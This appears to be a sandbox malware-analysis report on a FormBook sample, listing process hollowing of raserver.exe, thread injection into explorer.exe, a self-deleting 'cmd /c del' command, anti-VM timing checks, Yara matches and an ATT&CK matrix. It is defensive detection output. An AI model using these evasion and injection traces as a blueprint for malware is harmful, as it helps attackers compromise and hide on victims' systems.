          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044695F0 NtQueryInformationFile,18_2_044695F0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469670 NtQueryInformationProcess,18_2_04469670
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469A00 NtProtectVirtualMemory,18_2_04469A00
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469610 NtEnumerateValueKey,18_2_04469610
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469A10 NtQuerySection,18_2_04469A10
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469A20 NtResumeThread,18_2_04469A20
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469A80 NtOpenDirectoryObject,18_2_04469A80
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469760 NtOpenProcess,18_2_04469760
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469770 NtSetInformationFile,18_2_04469770
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0446A770 NtOpenThread,18_2_0446A770
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469B00 NtSetValueKey,18_2_04469B00
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0446A710 NtOpenProcessToken,18_2_0446A710
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469730 NtQueryVirtualMemory,18_2_04469730
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044697A0 NtUnmapViewOfSection,18_2_044697A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0446A3B0 NtGetContextThread,18_2_0446A3B0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E5A060 NtClose,18_2_02E5A060
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E5A110 NtAllocateVirtualMemory,18_2_02E5A110
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E59FE0 NtReadFile,18_2_02E59FE0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E59F30 NtCreateFile,18_2_02E59F30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E5A05B NtClose,18_2_02E5A05B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E59FDA NtReadFile,18_2_02E59FDA
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E59F84 NtCreateFile,18_2_02E59F84
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E59F2A NtCreateFile,18_2_02E59F2A
          Source: CNEW ORDER17.exe, 00000000.00000000.296992741.000000000026A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameConsoleApp17.exeB vs CNEW ORDER17.exe
          Source: CNEW ORDER17.exe, 00000000.00000002.424873904.00000000037B2000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePlyqntsieflxwczqxdgrrbh.dll" vs CNEW ORDER17.exe
          Source: CNEW ORDER17.exe, 0000000F.00000002.520200234.000000000125F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CNEW ORDER17.exe
          Source: CNEW ORDER17.exe, 0000000F.00000003.518794069.0000000000BBF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameraserver.exej% vs CNEW ORDER17.exe
          Source: CNEW ORDER17.exe, 0000000F.00000000.421473120.000000000059A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameConsoleApp17.exeB vs CNEW ORDER17.exe
          Source: CNEW ORDER17.exeBinary or memory string: OriginalFilenameConsoleApp17.exeB vs CNEW ORDER17.exe
          Source: CNEW ORDER17.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: CNEW ORDER17.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: CNEW ORDER17.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: CNEW ORDER17.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeFile read: C:\Users\user\Desktop\CNEW ORDER17.exe
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\CNEW ORDER17.exe 'C:\Users\user\Desktop\CNEW ORDER17.exe'
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeProcess created: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CNEW ORDER17.exe.log
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeFile created: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/3@0/0
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6628:120:WilError_01
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: CNEW ORDER17.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: CNEW ORDER17.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: CNEW ORDER17.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wntdll.pdbUGP source: CNEW ORDER17.exe, 0000000F.00000002.519709359.0000000000FB0000.00000040.00000001.sdmp, raserver.exe, 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
          Source: Binary string: RAServer.pdb source: CNEW ORDER17.exe, 0000000F.00000002.521099012.0000000003030000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdb source: CNEW ORDER17.exe, 0000000F.00000002.519709359.0000000000FB0000.00000040.00000001.sdmp, raserver.exe
          Source: Binary string: RAServer.pdbGCTL source: CNEW ORDER17.exe, 0000000F.00000002.521099012.0000000003030000.00000040.00020000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_0041D0D2 push eax; ret 15_2_0041D0D8
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_0041D0DB push eax; ret 15_2_0041D142
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_0041D085 push eax; ret 15_2_0041D0D8
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_0041D13C push eax; ret 15_2_0041D142
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_00417C84 pushfd ; ret 15_2_00417C8E
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0447D0D1 push ecx; ret 18_2_0447D0E4
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E5D0D2 push eax; ret 18_2_02E5D0D8
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E5D0DB push eax; ret 18_2_02E5D142
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E5D085 push eax; ret 18_2_02E5D0D8
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E5D13C push eax; ret 18_2_02E5D142
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E57C84 pushfd ; ret 18_2_02E57C8E
          Source: CNEW ORDER17.exeStatic PE information: 0xE32C5996 [Tue Oct 10 16:02:30 2090 UTC]
          Source: initial sampleStatic PE information: section name: .text entropy: 7.99906118019
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeFile created: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xEA
          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: /c del 'C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe'
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 0000000002E498E4 second address: 0000000002E498EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 0000000002E49B5E second address: 0000000002E49B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\CNEW ORDER17.exe TID: 4348Thread sleep count: 1054 > 30
          Source: C:\Users\user\Desktop\CNEW ORDER17.exe TID: 4348Thread sleep count: 34 > 30
          Source: C:\Users\user\Desktop\CNEW ORDER17.exe TID: 4348Thread sleep time: -34000s >= -30000s
          Source: C:\Users\user\Desktop\CNEW ORDER17.exe TID: 2244Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_00409A90 rdtsc 15_2_00409A90
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeWindow / User API: threadDelayed 1054
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeProcess information queried: ProcessInformation
          Source: explorer.exe, 00000010.00000000.455691375.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000010.00000000.455828193.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 00000010.00000000.470059747.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000010.00000000.455691375.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 00000010.00000000.470059747.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: explorer.exe, 00000010.00000000.455691375.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\raserver.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0442B1E1 mov eax, dword ptr fs:[00000030h]18_2_0442B1E1
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044D8DF1 mov eax, dword ptr fs:[00000030h]18_2_044D8DF1
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0445A185 mov eax, dword ptr fs:[00000030h]18_2_0445A185
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0444C182 mov eax, dword ptr fs:[00000030h]18_2_0444C182
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04422D8A mov eax, dword ptr fs:[00000030h]18_2_04422D8A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04422D8A mov eax, dword ptr fs:[00000030h]18_2_04422D8A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04422D8A mov eax, dword ptr fs:[00000030h]18_2_04422D8A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04422D8A mov eax, dword ptr fs:[00000030h]18_2_04422D8A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04422D8A mov eax, dword ptr fs:[00000030h]18_2_04422D8A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0445FD9B mov eax, dword ptr fs:[00000030h]18_2_0445FD9B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0445FD9B mov eax, dword ptr fs:[00000030h]18_2_0445FD9B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044535A1 mov eax, dword ptr fs:[00000030h]18_2_044535A1
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04429240 mov eax, dword ptr fs:[00000030h]18_2_04429240
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04429240 mov eax, dword ptr fs:[00000030h]18_2_04429240
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04429240 mov eax, dword ptr fs:[00000030h]18_2_04429240
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04429240 mov eax, dword ptr fs:[00000030h]18_2_04429240
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04437E41 mov eax, dword ptr fs:[00000030h]18_2_04437E41
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04437E41 mov eax, dword ptr fs:[00000030h]18_2_04437E41
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04437E41 mov eax, dword ptr fs:[00000030h]18_2_04437E41
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04437E41 mov eax, dword ptr fs:[00000030h]18_2_04437E41
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04437E41 mov eax, dword ptr fs:[00000030h]18_2_04437E41
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04437E41 mov eax, dword ptr fs:[00000030h]18_2_04437E41
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044DB260 mov eax, dword ptr fs:[00000030h]18_2_044DB260
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044DB260 mov eax, dword ptr fs:[00000030h]18_2_044DB260
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044F8A62 mov eax, dword ptr fs:[00000030h]18_2_044F8A62
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0443766D mov eax, dword ptr fs:[00000030h]18_2_0443766D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0444AE73 mov eax, dword ptr fs:[00000030h]18_2_0444AE73
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0444AE73 mov eax, dword ptr fs:[00000030h]18_2_0444AE73
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0444AE73 mov eax, dword ptr fs:[00000030h]18_2_0444AE73
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0444AE73 mov eax, dword ptr fs:[00000030h]18_2_0444AE73
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0444AE73 mov eax, dword ptr fs:[00000030h]18_2_0444AE73
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0446927A mov eax, dword ptr fs:[00000030h]18_2_0446927A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0442C600 mov eax, dword ptr fs:[00000030h]18_2_0442C600
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0442C600 mov eax, dword ptr fs:[00000030h]18_2_0442C600
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0442C600 mov eax, dword ptr fs:[00000030h]18_2_0442C600
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04443A1C mov eax, dword ptr fs:[00000030h]18_2_04443A1C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0442E620 mov eax, dword ptr fs:[00000030h]18_2_0442E620
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044DFE3F mov eax, dword ptr fs:[00000030h]18_2_044DFE3F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04468EC7 mov eax, dword ptr fs:[00000030h]18_2_04468EC7
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044536CC mov eax, dword ptr fs:[00000030h]18_2_044536CC
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044DFEC0 mov eax, dword ptr fs:[00000030h]18_2_044DFEC0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044F8ED6 mov eax, dword ptr fs:[00000030h]18_2_044F8ED6
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044376E2 mov eax, dword ptr fs:[00000030h]18_2_044376E2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044516E0 mov ecx, dword ptr fs:[00000030h]18_2_044516E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044BFE87 mov eax, dword ptr fs:[00000030h]18_2_044BFE87
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0445D294 mov eax, dword ptr fs:[00000030h]18_2_0445D294
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0445D294 mov eax, dword ptr fs:[00000030h]18_2_0445D294
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044252A5 mov eax, dword ptr fs:[00000030h]18_2_044252A5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044252A5 mov eax, dword ptr fs:[00000030h]18_2_044252A5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044252A5 mov eax, dword ptr fs:[00000030h]18_2_044252A5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044252A5 mov eax, dword ptr fs:[00000030h]18_2_044252A5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044252A5 mov eax, dword ptr fs:[00000030h]18_2_044252A5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044F0EA5 mov eax, dword ptr fs:[00000030h]18_2_044F0EA5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044F0EA5 mov eax, dword ptr fs:[00000030h]18_2_044F0EA5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044F0EA5 mov eax, dword ptr fs:[00000030h]18_2_044F0EA5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044A46A7 mov eax, dword ptr fs:[00000030h]18_2_044A46A7
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0443AAB0 mov eax, dword ptr fs:[00000030h]18_2_0443AAB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0443AAB0 mov eax, dword ptr fs:[00000030h]18_2_0443AAB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0445FAB0 mov eax, dword ptr fs:[00000030h]18_2_0445FAB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0442DB40 mov eax, dword ptr fs:[00000030h]18_2_0442DB40
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0443EF40 mov eax, dword ptr fs:[00000030h]18_2_0443EF40
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044F8B58 mov eax, dword ptr fs:[00000030h]18_2_044F8B58
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0442F358 mov eax, dword ptr fs:[00000030h]18_2_0442F358
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0442DB60 mov ecx, dword ptr fs:[00000030h]18_2_0442DB60
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0443FF60 mov eax, dword ptr fs:[00000030h]18_2_0443FF60
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044F8F6A mov eax, dword ptr fs:[00000030h]18_2_044F8F6A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04453B7A mov eax, dword ptr fs:[00000030h]18_2_04453B7A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04453B7A mov eax, dword ptr fs:[00000030h]18_2_04453B7A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044F070D mov eax, dword ptr fs:[00000030h]18_2_044F070D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044F070D mov eax, dword ptr fs:[00000030h]18_2_044F070D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044E131B mov eax, dword ptr fs:[00000030h]18_2_044E131B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044BFF10 mov eax, dword ptr fs:[00000030h]18_2_044BFF10
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044BFF10 mov eax, dword ptr fs:[00000030h]18_2_044BFF10
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04424F2E mov eax, dword ptr fs:[00000030h]18_2_04424F2E
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04424F2E mov eax, dword ptr fs:[00000030h]18_2_04424F2E
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0445E730 mov eax, dword ptr fs:[00000030h]18_2_0445E730
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044E138A mov eax, dword ptr fs:[00000030h]18_2_044E138A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04431B8F mov eax, dword ptr fs:[00000030h]18_2_04431B8F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04431B8F mov eax, dword ptr fs:[00000030h]18_2_04431B8F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044DD380 mov ecx, dword ptr fs:[00000030h]18_2_044DD380
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0445B390 mov eax, dword ptr fs:[00000030h]18_2_0445B390
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044A7794 mov eax, dword ptr fs:[00000030h]18_2_044A7794
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044A7794 mov eax, dword ptr fs:[00000030h]18_2_044A7794
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044A7794 mov eax, dword ptr fs:[00000030h]18_2_044A7794
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044F5BA5 mov eax, dword ptr fs:[00000030h]18_2_044F5BA5
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe; Process queried: DebugPort
          Source: C:\Windows\SysWOW64\raserver.exe; Process queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe; Code function: 15_2_0040ACD0 LdrLoadDll, 15_2_0040ACD0
          Source: C:\Users\user\Desktop\CNEW ORDER17.exe; Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe; Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: C0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe; Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\raserver.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\raserver.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe; Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe; Thread register set: target process: 3352
          Source: C:\Windows\SysWOW64\raserver.exe; Thread register set: target process: 3352
          Source: C:\Users\user\Desktop\CNEW ORDER17.exe; Process created: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe; Process created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: C:\Windows\SysWOW64\raserver.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe'
          Source: explorer.exe, 00000010.00000000.495329240.00000000011E0000.00000002.00020000.sdmp; Binary or memory string: Program Manager
          Source: explorer.exe, 00000010.00000000.448733880.0000000000B68000.00000004.00000020.sdmp; Binary or memory string: Progman\Pr
          Source: explorer.exe, 00000010.00000000.495329240.00000000011E0000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000010.00000000.495329240.00000000011E0000.00000002.00020000.sdmp; Binary or memory string: Progman
          Source: explorer.exe, 00000010.00000000.495329240.00000000011E0000.00000002.00020000.sdmp; Binary or memory string: Progmanlock
          Source: explorer.exe, 00000010.00000000.455828193.0000000008778000.00000004.00000001.sdmp; Binary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Desktop\CNEW ORDER17.exe; Queries volume information: C:\Users\user\Desktop\CNEW ORDER17.exe VolumeInformation
          Source: C:\Users\user\Desktop\CNEW ORDER17.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match; File source: 15.2.CNEW ORDER17.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 15.2.CNEW ORDER17.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000010.00000000.455090898.00000000079B2000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000012.00000002.569532126.0000000000350000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000000.00000002.424773076.0000000003719000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000010.00000000.472604115.00000000079B2000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000012.00000002.570686773.0000000002B40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000F.00000002.519487969.0000000000B30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000000.00000002.424873904.00000000037B2000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000F.00000002.519680465.0000000000F70000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 412 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 121 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
